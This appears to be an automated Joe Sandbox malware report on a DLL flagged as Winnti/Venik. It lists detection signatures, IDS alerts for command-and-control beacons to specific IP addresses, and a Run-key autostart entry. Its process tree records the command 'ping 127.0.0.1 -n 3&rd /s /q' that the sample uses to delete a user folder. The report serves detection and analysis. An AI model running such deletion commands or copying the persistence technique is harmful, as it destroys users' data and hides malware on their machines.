Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4hSuRTwnWJ.dll

Overview

General Information

Sample name:4hSuRTwnWJ.dll
renamed because original name is a hash value
Original sample name:0e275564dda101e8ea8a47cd5469a7f8ea90c77c.dll
Analysis ID:1578337
MD5:8d7405be2b8547960e9c68184d273fa4
SHA1:0e275564dda101e8ea8a47cd5469a7f8ea90c77c
SHA256:7f2b01e4a8eb8f0f1e7710f51dcad9963d1d4fd5be7a89b9115cb0176cf4f007
Tags:dlluser-NDA0E
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7508 cmdline: loaddll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7560 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7584 cmdline: rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7568 cmdline: rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7716 cmdline: rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7816 cmdline: rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,WriteErrorLog MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7992 cmdline: rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8000 cmdline: rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 8156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 8016 cmdline: rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 8056 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 8108 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 2056 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 1168 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3020 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 2500 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 5484 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6964 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
4hSuRTwnWJ.dllWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x39c0e:$x1: cracked by ximo
  • 0x39cc8:$x1: cracked by ximo
  • 0x39d82:$x1: cracked by ximo
  • 0x39e3c:$x1: cracked by ximo
  • 0x39ef6:$x1: cracked by ximo
  • 0x39fb0:$x1: cracked by ximo
  • 0x3a06a:$x1: cracked by ximo
  • 0x3a124:$x1: cracked by ximo
  • 0x3a625:$x1: cracked by ximo
  • 0x3a920:$x1: cracked by ximo

Unpacked PEs

SourceRuleDescriptionAuthorStrings
14.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x39c0e:$x1: cracked by ximo
  • 0x39cc8:$x1: cracked by ximo
  • 0x39d82:$x1: cracked by ximo
  • 0x39e3c:$x1: cracked by ximo
  • 0x39ef6:$x1: cracked by ximo
  • 0x39fb0:$x1: cracked by ximo
  • 0x3a06a:$x1: cracked by ximo
  • 0x3a124:$x1: cracked by ximo
  • 0x3a625:$x1: cracked by ximo
  • 0x3a920:$x1: cracked by ximo
7.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x39c0e:$x1: cracked by ximo
  • 0x39cc8:$x1: cracked by ximo
  • 0x39d82:$x1: cracked by ximo
  • 0x39e3c:$x1: cracked by ximo
  • 0x39ef6:$x1: cracked by ximo
  • 0x39fb0:$x1: cracked by ximo
  • 0x3a06a:$x1: cracked by ximo
  • 0x3a124:$x1: cracked by ximo
  • 0x3a625:$x1: cracked by ximo
  • 0x3a920:$x1: cracked by ximo
11.2.rundll32.exe.10000000.0.unpackWinnti_NlaifSvcWinnti sample - file NlaifSvc.dllFlorian Roth
  • 0x39c0e:$x1: cracked by ximo
  • 0x39cc8:$x1: cracked by ximo
  • 0x39d82:$x1: cracked by ximo
  • 0x39e3c:$x1: cracked by ximo
  • 0x39ef6:$x1: cracked by ximo
  • 0x39fb0:$x1: cracked by ximo
  • 0x3a06a:$x1: cracked by ximo
  • 0x3a124:$x1: cracked by ximo
  • 0x3a625:$x1: cracked by ximo
  • 0x3a920:$x1: cracked by ximo

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7816, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wfl

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:44:05.594789+010028032742Potentially Bad Traffic192.168.2.749831116.133.8.9280TCP
2024-12-19T15:44:07.570858+010028032742Potentially Bad Traffic192.168.2.749835116.133.8.9280TCP
2024-12-19T15:44:11.622907+010028032742Potentially Bad Traffic192.168.2.749850116.133.8.9280TCP
2024-12-19T15:44:17.657602+010028032742Potentially Bad Traffic192.168.2.749869116.133.8.9280TCP
2024-12-19T15:44:19.604855+010028032742Potentially Bad Traffic192.168.2.749876116.133.8.9280TCP
2024-12-19T15:44:24.545572+010028032742Potentially Bad Traffic192.168.2.749890116.133.8.9280TCP
2024-12-19T15:44:29.845942+010028032742Potentially Bad Traffic192.168.2.749904116.133.8.9280TCP
2024-12-19T15:44:32.697810+010028032742Potentially Bad Traffic192.168.2.749918116.133.8.9280TCP
2024-12-19T15:44:35.942348+010028032742Potentially Bad Traffic192.168.2.749932116.133.8.9280TCP
2024-12-19T15:44:40.914476+010028032742Potentially Bad Traffic192.168.2.749948116.133.8.9280TCP
2024-12-19T15:44:45.786071+010028032742Potentially Bad Traffic192.168.2.749958116.133.8.9280TCP
2024-12-19T15:44:50.066130+010028032742Potentially Bad Traffic192.168.2.749971116.133.8.9280TCP
2024-12-19T15:44:52.138073+010028032742Potentially Bad Traffic192.168.2.749983116.133.8.9280TCP
2024-12-19T15:44:56.021161+010028032742Potentially Bad Traffic192.168.2.749996116.133.8.9280TCP
2024-12-19T15:45:00.168420+010028032742Potentially Bad Traffic192.168.2.750008116.133.8.9280TCP
2024-12-19T15:45:04.168789+010028032742Potentially Bad Traffic192.168.2.750022116.133.8.9280TCP
2024-12-19T15:45:08.217091+010028032742Potentially Bad Traffic192.168.2.750036116.133.8.9280TCP
2024-12-19T15:45:12.344300+010028032742Potentially Bad Traffic192.168.2.750050116.133.8.9280TCP
2024-12-19T15:45:16.332173+010028032742Potentially Bad Traffic192.168.2.750063116.133.8.9280TCP
2024-12-19T15:45:21.155101+010028032742Potentially Bad Traffic192.168.2.750076116.133.8.9280TCP
2024-12-19T15:45:24.700673+010028032742Potentially Bad Traffic192.168.2.750082116.133.8.9280TCP
2024-12-19T15:45:30.907926+010028032742Potentially Bad Traffic192.168.2.750089116.133.8.9280TCP
2024-12-19T15:45:35.048659+010028032742Potentially Bad Traffic192.168.2.750091116.133.8.9280TCP
2024-12-19T15:45:37.254137+010028032742Potentially Bad Traffic192.168.2.750095116.133.8.9280TCP
2024-12-19T15:45:43.281550+010028032742Potentially Bad Traffic192.168.2.750099116.133.8.9280TCP
2024-12-19T15:45:45.581284+010028032742Potentially Bad Traffic192.168.2.750101116.133.8.9280TCP
2024-12-19T15:45:49.602083+010028032742Potentially Bad Traffic192.168.2.750107116.133.8.9280TCP
2024-12-19T15:45:55.595696+010028032742Potentially Bad Traffic192.168.2.750112116.133.8.9280TCP
2024-12-19T15:45:57.543920+010028032742Potentially Bad Traffic192.168.2.750115116.133.8.9280TCP
2024-12-19T15:46:01.546959+010028032742Potentially Bad Traffic192.168.2.750119116.133.8.9280TCP
2024-12-19T15:46:07.590366+010028032742Potentially Bad Traffic192.168.2.750124116.133.8.9280TCP
2024-12-19T15:46:09.738406+010028032742Potentially Bad Traffic192.168.2.750129116.133.8.9280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:43:57.329698+010028032702Potentially Bad Traffic192.168.2.749706107.163.56.23518530TCP
2024-12-19T15:43:57.329783+010028032702Potentially Bad Traffic192.168.2.749707107.163.56.11018530TCP
2024-12-19T15:44:05.594787+010028032702Potentially Bad Traffic192.168.2.749816107.163.56.23618963TCP
2024-12-19T15:44:05.594788+010028032702Potentially Bad Traffic192.168.2.749817107.163.56.23618963TCP
2024-12-19T15:44:09.594701+010028032702Potentially Bad Traffic192.168.2.749836107.163.56.23618963TCP
2024-12-19T15:44:09.594868+010028032702Potentially Bad Traffic192.168.2.749834107.163.56.23618963TCP
2024-12-19T15:44:13.638795+010028032702Potentially Bad Traffic192.168.2.749849107.163.56.23618963TCP
2024-12-19T15:44:13.638840+010028032702Potentially Bad Traffic192.168.2.749848107.163.56.23618963TCP
2024-12-19T15:44:17.657648+010028032702Potentially Bad Traffic192.168.2.749860107.163.56.23618963TCP
2024-12-19T15:44:17.657676+010028032702Potentially Bad Traffic192.168.2.749861107.163.56.23618963TCP
2024-12-19T15:44:21.658723+010028032702Potentially Bad Traffic192.168.2.749874107.163.56.23618963TCP
2024-12-19T15:44:21.658747+010028032702Potentially Bad Traffic192.168.2.749875107.163.56.23618963TCP
2024-12-19T15:44:25.829240+010028032702Potentially Bad Traffic192.168.2.749891107.163.56.23618963TCP
2024-12-19T15:44:25.829314+010028032702Potentially Bad Traffic192.168.2.749889107.163.56.23618963TCP
2024-12-19T15:44:29.845987+010028032702Potentially Bad Traffic192.168.2.749905107.163.56.23618963TCP
2024-12-19T15:44:29.846026+010028032702Potentially Bad Traffic192.168.2.749903107.163.56.23618963TCP
2024-12-19T15:44:33.860437+010028032702Potentially Bad Traffic192.168.2.749916107.163.56.23618963TCP
2024-12-19T15:44:33.860453+010028032702Potentially Bad Traffic192.168.2.749917107.163.56.23618963TCP
2024-12-19T15:44:37.876350+010028032702Potentially Bad Traffic192.168.2.749931107.163.56.23618963TCP
2024-12-19T15:44:37.876495+010028032702Potentially Bad Traffic192.168.2.749933107.163.56.23618963TCP
2024-12-19T15:44:41.891938+010028032702Potentially Bad Traffic192.168.2.749941107.163.56.23618963TCP
2024-12-19T15:44:41.891944+010028032702Potentially Bad Traffic192.168.2.749942107.163.56.23618963TCP
2024-12-19T15:44:45.892187+010028032702Potentially Bad Traffic192.168.2.749955107.163.56.23618963TCP
2024-12-19T15:44:45.892217+010028032702Potentially Bad Traffic192.168.2.749957107.163.56.23618963TCP
2024-12-19T15:44:50.066090+010028032702Potentially Bad Traffic192.168.2.749968107.163.56.23618963TCP
2024-12-19T15:44:50.066134+010028032702Potentially Bad Traffic192.168.2.749970107.163.56.23618963TCP
2024-12-19T15:44:54.079517+010028032702Potentially Bad Traffic192.168.2.749982107.163.56.23618963TCP
2024-12-19T15:44:54.079535+010028032702Potentially Bad Traffic192.168.2.749981107.163.56.23618963TCP
2024-12-19T15:44:58.095063+010028032702Potentially Bad Traffic192.168.2.749995107.163.56.23618963TCP
2024-12-19T15:44:58.095139+010028032702Potentially Bad Traffic192.168.2.749994107.163.56.23618963TCP
2024-12-19T15:45:02.095750+010028032702Potentially Bad Traffic192.168.2.750009107.163.56.23618963TCP
2024-12-19T15:45:02.095873+010028032702Potentially Bad Traffic192.168.2.750007107.163.56.23618963TCP
2024-12-19T15:45:06.110726+010028032702Potentially Bad Traffic192.168.2.750021107.163.56.23618963TCP
2024-12-19T15:45:06.110796+010028032702Potentially Bad Traffic192.168.2.750023107.163.56.23618963TCP
2024-12-19T15:45:10.251760+010028032702Potentially Bad Traffic192.168.2.750034107.163.56.23618963TCP
2024-12-19T15:45:10.251799+010028032702Potentially Bad Traffic192.168.2.750035107.163.56.23618963TCP
2024-12-19T15:45:14.376757+010028032702Potentially Bad Traffic192.168.2.750049107.163.56.23618963TCP
2024-12-19T15:45:14.376788+010028032702Potentially Bad Traffic192.168.2.750047107.163.56.23618963TCP
2024-12-19T15:45:18.501796+010028032702Potentially Bad Traffic192.168.2.750062107.163.56.23618963TCP
2024-12-19T15:45:18.501812+010028032702Potentially Bad Traffic192.168.2.750061107.163.56.23618963TCP
2024-12-19T15:45:22.642349+010028032702Potentially Bad Traffic192.168.2.750074107.163.56.23618963TCP
2024-12-19T15:45:22.642422+010028032702Potentially Bad Traffic192.168.2.750075107.163.56.23618963TCP
2024-12-19T15:45:26.782816+010028032702Potentially Bad Traffic192.168.2.750083107.163.56.23618963TCP
2024-12-19T15:45:26.782873+010028032702Potentially Bad Traffic192.168.2.750081107.163.56.23618963TCP
2024-12-19T15:45:30.907815+010028032702Potentially Bad Traffic192.168.2.750088107.163.56.23618963TCP
2024-12-19T15:45:30.907870+010028032702Potentially Bad Traffic192.168.2.750087107.163.56.23618963TCP
2024-12-19T15:45:35.048602+010028032702Potentially Bad Traffic192.168.2.750090107.163.56.23618963TCP
2024-12-19T15:45:35.048682+010028032702Potentially Bad Traffic192.168.2.750092107.163.56.23618963TCP
2024-12-19T15:45:39.189229+010028032702Potentially Bad Traffic192.168.2.750094107.163.56.23618963TCP
2024-12-19T15:45:39.189638+010028032702Potentially Bad Traffic192.168.2.750093107.163.56.23618963TCP
2024-12-19T15:45:43.281393+010028032702Potentially Bad Traffic192.168.2.750098107.163.56.23618963TCP
2024-12-19T15:45:43.281526+010028032702Potentially Bad Traffic192.168.2.750097107.163.56.23618963TCP
2024-12-19T15:45:47.568847+010028032702Potentially Bad Traffic192.168.2.750100107.163.56.23618963TCP
2024-12-19T15:45:47.568919+010028032702Potentially Bad Traffic192.168.2.750102107.163.56.23618963TCP
2024-12-19T15:45:51.582882+010028032702Potentially Bad Traffic192.168.2.750106107.163.56.23618963TCP
2024-12-19T15:45:51.583048+010028032702Potentially Bad Traffic192.168.2.750105107.163.56.23618963TCP
2024-12-19T15:45:55.595606+010028032702Potentially Bad Traffic192.168.2.750111107.163.56.23618963TCP
2024-12-19T15:45:55.595652+010028032702Potentially Bad Traffic192.168.2.750109107.163.56.23618963TCP
2024-12-19T15:45:59.505622+010028032702Potentially Bad Traffic192.168.2.750113107.163.56.23618963TCP
2024-12-19T15:45:59.505671+010028032702Potentially Bad Traffic192.168.2.750114107.163.56.23618963TCP
2024-12-19T15:46:03.630963+010028032702Potentially Bad Traffic192.168.2.750118107.163.56.23618963TCP
2024-12-19T15:46:03.631188+010028032702Potentially Bad Traffic192.168.2.750117107.163.56.23618963TCP
2024-12-19T15:46:07.642525+010028032702Potentially Bad Traffic192.168.2.750122107.163.56.23618963TCP
2024-12-19T15:46:07.642668+010028032702Potentially Bad Traffic192.168.2.750123107.163.56.23618963TCP
2024-12-19T15:46:11.768467+010028032702Potentially Bad Traffic192.168.2.750127107.163.56.23618963TCP
2024-12-19T15:46:11.768496+010028032702Potentially Bad Traffic192.168.2.750128107.163.56.23618963TCP
2024-12-19T15:46:33.781862+010028032702Potentially Bad Traffic192.168.2.750131107.163.56.23618963TCP
2024-12-19T15:46:33.922562+010028032702Potentially Bad Traffic192.168.2.750132107.163.56.23618963TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:43:58.477678+010028124061Malware Command and Control Activity Detected192.168.2.749808107.163.56.2516658TCP
2024-12-19T15:44:38.857491+010028124061Malware Command and Control Activity Detected192.168.2.749945107.163.56.2516658TCP
2024-12-19T15:45:01.080211+010028124061Malware Command and Control Activity Detected192.168.2.750017107.163.56.2516658TCP
2024-12-19T15:45:23.209488+010028124061Malware Command and Control Activity Detected192.168.2.750084107.163.56.2516658TCP
2024-12-19T15:45:45.388903+010028124061Malware Command and Control Activity Detected192.168.2.750103107.163.56.2516658TCP
2024-12-19T15:46:07.514473+010028124061Malware Command and Control Activity Detected192.168.2.750125107.163.56.2516658TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T15:43:57.329698+010028124071Malware Command and Control Activity Detected192.168.2.749706107.163.56.23518530TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 4hSuRTwnWJ.dllAvira: detected
Multi AV Scanner detection for submitted file
Source: 4hSuRTwnWJ.dllReversingLabs: Detection: 78%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: 4hSuRTwnWJ.dllJoe Sandbox ML: detected
Source: 4hSuRTwnWJ.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49937 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50041 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50108 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50120 version: TLS 1.2
Source: Binary string: label.pdb source: 4hSuRTwnWJ.dll
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 0000000B.00000003.2316321450.00000000068F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 0000000B.00000003.2726820415.00000000033C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.* source: rundll32.exe, 0000000B.00000003.2293758335.00000000033CA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2812407 - Severity 1 - ETPRO MALWARE Win32/Venik HTTP CnC Beacon : 192.168.2.7:49706 -> 107.163.56.235:18530
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:49945 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:49808 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:50017 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:50084 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:50103 -> 107.163.56.251:6658
Source: Network trafficSuricata IDS: 2812406 - Severity 1 - ETPRO MALWARE Win32/Venik CnC Beacon : 192.168.2.7:50125 -> 107.163.56.251:6658
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.236 18963Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.235 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.133.8.92 443Jump to behavior
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 107.163.56.236 ports 18963,1,3,6,8,9
Source: global trafficTCP traffic: 107.163.56.235 ports 18530,0,1,3,5,8
Source: global trafficTCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 18963
